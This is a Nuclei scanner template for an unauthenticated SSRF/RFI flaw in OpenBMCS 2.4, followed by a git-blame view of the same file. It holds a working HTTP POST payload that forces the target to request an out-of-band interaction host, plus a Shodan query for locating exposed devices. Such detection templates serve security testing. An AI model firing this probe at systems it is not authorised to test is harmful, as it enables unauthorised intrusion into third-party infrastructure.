nuclei-templates/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml

id: openbmcs-ssrf

info:
  name: OpenBMCS 2.4 - Server-Side Request Forgery /  Remote File Inclusion
  author: dhiyaneshDK
  severity: medium
  description: OpenBMCS 2.4 is susceptible to unauthenticated server-side request forgery and remote file inclusion vulnerabilities within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host.
  reference:
    - https://www.exploit-db.com/exploits/50670
    - https://securityforeveryone.com/tools/openbmcs-unauth-ssrf-rfi-vulnerability-scanner
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 6.8
    cwe-id: CWE-918
  metadata:
    max-request: 1
    shodan-query: http.favicon.hash:1550906681
  tags: ssrf,oast,openbmcs,edb

http:
  - raw:
      - |
        POST /php/query.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        ip={{interactsh-url}}:80&argu=/

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "http"

      - type: status
        status:
          - 302

# Enhanced by mp on 2022/09/15
OpenBMCS Info Disclosure & SSRF Unauth (#3603) * Create gophish-login.yaml * Create gophish-workflow.yaml * Update gophish-workflow.yaml * Create openbmcs-secret-disclosure.yaml * Create openbmcs-ssrf.yaml * Added additional matcher * Added missing header + matcher update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: root <root@3gzk.l.time4vps.cloud> 2022-01-26 11:26:40 +00:00			`id: openbmcs-ssrf`

			`info:`
Dashboard Content Enhancements (#5372) Dashboard Content Enhancements 2022-09-16 19:50:10 +00:00			`name: OpenBMCS 2.4 - Server-Side Request Forgery / Remote File Inclusion`
OpenBMCS Info Disclosure & SSRF Unauth (#3603) * Create gophish-login.yaml * Create gophish-workflow.yaml * Update gophish-workflow.yaml * Create openbmcs-secret-disclosure.yaml * Create openbmcs-ssrf.yaml * Added additional matcher * Added missing header + matcher update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: root <root@3gzk.l.time4vps.cloud> 2022-01-26 11:26:40 +00:00			`author: dhiyaneshDK`
trailing spaces fixed 2023-01-24 07:29:21 +00:00			`severity: medium`
Dashboard Content Enhancements (#5372) Dashboard Content Enhancements 2022-09-16 19:50:10 +00:00			`description: OpenBMCS 2.4 is susceptible to unauthenticated server-side request forgery and remote file inclusion vulnerabilities within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://www.exploit-db.com/exploits/50670`
Dashboard Content Enhancements (#5372) Dashboard Content Enhancements 2022-09-16 19:50:10 +00:00			`- https://securityforeveryone.com/tools/openbmcs-unauth-ssrf-rfi-vulnerability-scanner`
			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N`
			`cvss-score: 6.8`
			`cwe-id: CWE-918`
OpenBMCS Info Disclosure & SSRF Unauth (#3603) * Create gophish-login.yaml * Create gophish-workflow.yaml * Update gophish-workflow.yaml * Create openbmcs-secret-disclosure.yaml * Create openbmcs-ssrf.yaml * Added additional matcher * Added missing header + matcher update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: root <root@3gzk.l.time4vps.cloud> 2022-01-26 11:26:40 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 1`
OpenBMCS Info Disclosure & SSRF Unauth (#3603) * Create gophish-login.yaml * Create gophish-workflow.yaml * Update gophish-workflow.yaml * Create openbmcs-secret-disclosure.yaml * Create openbmcs-ssrf.yaml * Added additional matcher * Added missing header + matcher update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: root <root@3gzk.l.time4vps.cloud> 2022-01-26 11:26:40 +00:00			`shodan-query: http.favicon.hash:1550906681`
Auto Generated CVE annotations [Sat Aug 27 04:41:18 UTC 2022] :robot: 2022-08-27 04:41:18 +00:00			`tags: ssrf,oast,openbmcs,edb`
OpenBMCS Info Disclosure & SSRF Unauth (#3603) * Create gophish-login.yaml * Create gophish-workflow.yaml * Update gophish-workflow.yaml * Create openbmcs-secret-disclosure.yaml * Create openbmcs-ssrf.yaml * Added additional matcher * Added missing header + matcher update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: root <root@3gzk.l.time4vps.cloud> 2022-01-26 11:26:40 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
OpenBMCS Info Disclosure & SSRF Unauth (#3603) * Create gophish-login.yaml * Create gophish-workflow.yaml * Update gophish-workflow.yaml * Create openbmcs-secret-disclosure.yaml * Create openbmcs-ssrf.yaml * Added additional matcher * Added missing header + matcher update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: root <root@3gzk.l.time4vps.cloud> 2022-01-26 11:26:40 +00:00			`- raw:`
			`- \|`
			`POST /php/query.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`

			`ip={{interactsh-url}}:80&argu=/`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms the DNS Interaction`
			`words:`
			`- "http"`

			`- type: status`
			`status:`
			`- 302`
Dashboard Content Enhancements (#5372) Dashboard Content Enhancements 2022-09-16 19:50:10 +00:00
			`# Enhanced by mp on 2022/09/15`